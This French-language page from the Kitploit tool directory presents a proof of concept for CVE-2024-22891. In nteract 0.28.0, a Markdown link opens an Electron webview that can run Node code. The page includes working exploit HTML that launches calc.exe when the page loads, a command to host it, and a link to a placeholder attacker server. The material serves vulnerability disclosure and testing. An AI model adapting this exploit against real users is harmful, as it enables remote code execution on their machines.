Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-22891 — nteract 0.28.0 open redirect to RCE exploit | Kitploit
Outils/GitHubGitHub/eqstlab/cve-2024-22891
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubeqstlab/cve-2024-22891

CVE-2024-22891

nteract 0.28.0 open redirect to RCE exploit

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Nteract PoC

Une preuve de concept pour la vulnérabilité CVE-2024-22891.

nteract 0.28.0 permet une vue web Electron via un lien Markdown, avec une exécution de code à distance résultante.

Dans ce dépôt se trouve un exemple d'application vulnérable et une exploitation de preuve de concept (POC) de celle-ci. En tant que PoC, il y a un fichier python qui automatise le processus.

1. Aperçu de la vulnérabilité :

  • Sujet de la vulnérabilité : Markdown link RCE
  • Type de vulnérabilité : Autre : Redirection ouverte
  • Manifestation du problème : Vue Web Electron
  • Composant affecté : markdown
  • Type d'attaque : Exécution de code à distance
  • Vecteurs d'attaque : Pour exploiter la vulnérabilité, quelqu'un doit cliquer sur le lien ou accéder au lien du projet partagé.
  • Numéro CVE réservé : CVE-2024-22891

2. Cause de la vulnérabilité :

  • nteract 0.28.0 permet une vue web Electron via un lien Markdown, avec une exécution de code à distance résultante (car nodeIntegration dans webPreferences est vrai).

  • Explication de l'exploit

    • Lors de la génération de liens via MarkDown dans l'application, cela crée une WebView via Electron, permettant un accès externe au lien. Par conséquent, un attaquant peut réaliser une exécution de code à distance (RCE) en se connectant au lien menant au serveur de l'attaquant.

Preuve de concept (POC)

Étape 1) L'attaquant crée un serveur avec le code source pour lancer calc.exe en utilisant la fonction openExternal().

root@kitploit:~
<html>
<head>
    <title>jruru Link</title>
</head>
<body>
    <a id="jruruLink">jruru Link</a>

    <script>
         // Script function definition
        function openExternal() {
            try {
                const { shell } = require('electron');
                shell.openExternal('file:C:/Windows/System32/calc.exe');
            } catch(e) {
                alert('JRURU - External link cannot be opened.');
                console.error(e);
            }
        }
        // Automatically execute openExternal function after the page is loaded
        document.addEventListener('DOMContentLoaded', function() {
            openExternal();
        });
    </script>
</body>
</html>

Remarque : ※ Si vous voulez le tester rapidement, créez un serveur sur le PC de l'attaquant avec le code suivant.

root@kitploit:~
$ python -m http.server 80

Étape 2) Exécutez l'application nteract sur le système de la victime et créez un lien Markdown, ou partagez le fichier ipynb de l'attaquant comme exemple de code. Ensuite, exécutez calc.exe.

root@kitploit:~
[Read This] (http://[attcker_adress]/shard_data.html)

neteract nteract2


3. Informations supplémentaires

Lors de l'exécution d'un fichier .ipynb via le partage de fichiers, soyez prudent car le lien peut ne pas être visible. Ce calc.exe aurait pu être n'importe quelle charge utile malveillante locale ou distante qui aurait pu donner à l'attaquant un accès complet au système de la victime.

Télécharger l’outil